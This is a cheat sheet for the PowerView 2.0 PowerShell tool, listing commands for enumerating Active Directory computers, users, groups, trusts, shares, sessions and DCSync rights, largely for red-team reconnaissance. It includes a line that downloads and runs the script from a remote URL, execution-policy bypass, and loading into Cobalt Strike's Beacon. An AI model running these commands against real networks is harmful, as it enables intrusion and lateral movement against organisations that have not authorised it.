The document provides a cheat sheet for the Powerview 2.0 tool, which can be used to enumerate information on a domain through LDAP queries. It lists common commands for discovering computers, users, groups and their members on a domain. It describes options for the commands to filter results, write output to files, and reflect queries through a specific domain controller.
Getting Started

  Get PowerView: http://bit.ly/1pzQCnv
  Load from disk: 1) C:\> powershell -exec bypass  2) PS C:\> Import-Module powerview.ps1
  Load from GitHub: PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://bit.ly/1pzQCnv")
  Run on non-domain joined machine: 1) configure DNS to point to DC of domain, 2) runas /netonly /user:DOMAIN\user powershell.exe
  Load in Cobalt Strike's Beacon: beacon> powershell-import /local/path/to/powerview.ps1, then beacon> powershell CMDLET-NAME
  Getting help: PS C:\> Get-Help Cmdlet-Name [-detailed] [-full]
  Most PowerView functions are implemented in Empire in situational_awareness/network/powerview/*

Identifying Your Prey

  Get-NetComputer will enumerate computer objects on a given domain through LDAP, returning hostnames by default.
    Return only live hosts: -Ping
    Full computer objects (not just hostnames): -FullData
    Search w/ specific LDAP filter: -Filter "(description=*web*)"
    Search specific domain ADS path (e.g. OUs): -ADSpath "LDAP://OU=secret, ..."
    Machines with unconstrained delegation: -Unconstrained

  Get-NetGroup will enumerate group objects on a given domain through LDAP.
    Return specific name results: -GroupName *admin*
    Full group objects: -FullData
    (Nested) groups a specific user is a member of: -UserName USER

  Get-NetGroupMember will enumerate the members of a specific group on a given domain through LDAP.
    Specified group name: -GroupName "Domain Admins"
    Full user objects: -FullData
    Recursively resolve the members of any results found that are groups: -Recurse

  Get-NetUser will enumerate user objects on a given domain through LDAP.
    Return specific name results: -UserName "*john*"
    File of user names to search for: -UserFile users.txt
    Search w/ specific LDAP filter: -Filter "(field=*term*)"
    Return users who are (or were) a member of an admin protected group: -AdminCount
    Users with a service principal name set (likely service accounts): -SPN
    Search specific domain ADS path: -ADSpath "LDAP://OU=secret, ..."

  Find-UserField will search a specified user field/property for a given term for all user objects through LDAP.
    Specify the field to search: -SearchField description
    Term to search for: -SearchTerm term

Common Cmdlet Options

  Display verbose status/debug information: -Verbose
  Add a 10 second delay between enumerating each machine: -Delay 10
  Execute a "meta" function with 15 threads: -Threads 15
  Pull information from a foreign domain (otherwise functions default to the current domain): -Domain foreign.com
  Reflect LDAP queries through a specific DC: -DomainController dc.domain.com
  Execute a command/search on/for a specified computer: -ComputerName SERVER.domain.com

  Many "search" cmdlets (e.g. Invoke-UserHunter) also have additional common options:
    Don't ping machines before enumerating them: -NoPing
    File of computer names to enumerate: -ComputerFile file.txt
    Enumerate computers w/ specific LDAP filter: -ComputerFilter "(description=*web*)"
    Enumerate computers on a specific ADS path (e.g. in specific OUs): -ComputerADSpath "LDAP://OU=secret,..."
    Search for users w/ specific LDAP filter: -UserFilter "(description=*web*)"
    Only search for users on a specific ADS path: -UserADSpath "LDAP://OU=secret, ..."

Filtering and Output

  Execute a command on each result object: ... | %{ ... Invoke-Command $_ }
  Filter result objects by field: ... | ? { $_.Field -eq X }
  Only return certain properties: ... | Select prop1,prop2
  Display output as a list: ... | fl
  Display output as wrapped table: ... | ft -wrap
  Write out to file: ... | Out-File -Encoding Ascii out.txt
  Write to .csv: ... | Export-CSV -NoTypeInformation out.csv
  Write to .xml object: ... | Export-Clixml obj.xml
  Read .xml object: $obj = Import-Clixml obj.xml

User-Hunting

  Invoke-UserHunter will use LDAP queries and API calls to locate users on the domain. Note: default behavior searches for "Domain Admins" and touches every machine on the domain!
    Hunt for members of a specific group: -GroupName "Web Admins"
    Show all results (i.e. don't filter by user targets): -ShowAll
    Hunt using only session information from file servers/DCs: -Stealth
    Hunt for users who are effective local admins for a given server: -TargetServer SERVER.domain.com
    Stop on first successful result found: -StopOnSuccess

Data Mining

  Invoke-ShareFinder will use LDAP queries and API calls to search for open shares on the domain. Note: default behavior touches every machine on the domain!
    Only return shares the current user can read: -CheckShareAccess

  Find-InterestingFile will recursively search a given local/UNC path for files matching specific criteria.
    Search a specific UNC path: -Path \\SERVER\Share
    Only return files with the specified search terms in their names: -Terms term1,term2,term3
    Only return office docs: -OfficeDocs
    Only return files accessed within the last week: -LastAccessTime (Get-Date).AddDays(-7)

Domain [Trusts]

  Info on the current domain: Get-NetDomain
  Domain controllers for the current domain: Get-NetDomainController
  Info on the current forest: Get-NetForest
  Enumerate all domains in the current forest: Get-NetForestDomain
  Get all forest trusts for the current forest: Get-NetForestTrust
  Get all domain trusts (a la nltest /trusted_domains): Get-NetDomainTrust
  Recursively map all domain trusts: Invoke-MapDomainTrust
  Find users in groups outside of the given domain (outgoing access): Find-ForeignUser
  Find groups w/ users outside of the given domain (incoming access): Find-ForeignGroup
  Enumerate local administrators in groups not in the given domain: Invoke-EnumerateLocalAdmin -Domain target.domain.com -TrustGroup

Local Admin Enumeration

  Get-NetLocalGroup will enumerate the local users/groups from localhost or a remote machine.
    Enumerate local admins from hostname (or IP): -ComputerName X
    List the local groups instead of group members: -ListGroups
    Use an alternate group besides local admins: -GroupName "Remote Desktop Users"
    Resolve any results that are groups, giving a set of effective users: -Recurse

Misc. Functions

  Search domain OUs: Get-NetOU
  Get all likely fileservers: Get-NetFileServer
  Get shares for a specific machine X.domain.com: Get-NetShare
  Get sessions for a specific machine X.domain.com: Get-NetSession
  Get logged on users for a specific machine X.domain.com: Get-NetLoggedOn
  Get RDP sessions (and source IPs) for X.domain.com: Get-NetRDPSession
  Get (possibly) exploitable systems: Get-ExploitableSystem

Power-One-Liners

  Take a GPP GUID and get all computers the local admin password is applied to:
    Get-NetOU -GUID {GPP_GUID} | %{ Get-NetComputer -ADSPath $_ }
  Find machines the current user has local admin access on:
    Find-LocalAdminAccess
  Get the default domain access policy:
    Get-DomainPolicy | Select -Expand SystemAccess
  See who can admin all domain controllers in the current domain:
    Get-NetDomainController | Get-NetLocalGroup
  See what objects have DCSync rights:
    Get-ObjectACL -DistinguishedName "dc=domain,dc=local" -ResolveGUIDs | ? { ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') }
  Users with sidHistory set:
    Get-NetUser -Filter '(sidHistory=*)'
  Users with passwords > 1 year:
    $Date = (Get-Date).AddYears(-1).ToFileTime(); Get-NetUser -Filter "(pwdlastset<=$Date)"
  Search SYSVol for common scripts:
    Invoke-FileFinder -SearchSYSVol

More Information

  http://www.harmj0y.net/blog/tag/powerview/
  http://www.verisgroup.com/adaptive-threat-division/
Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.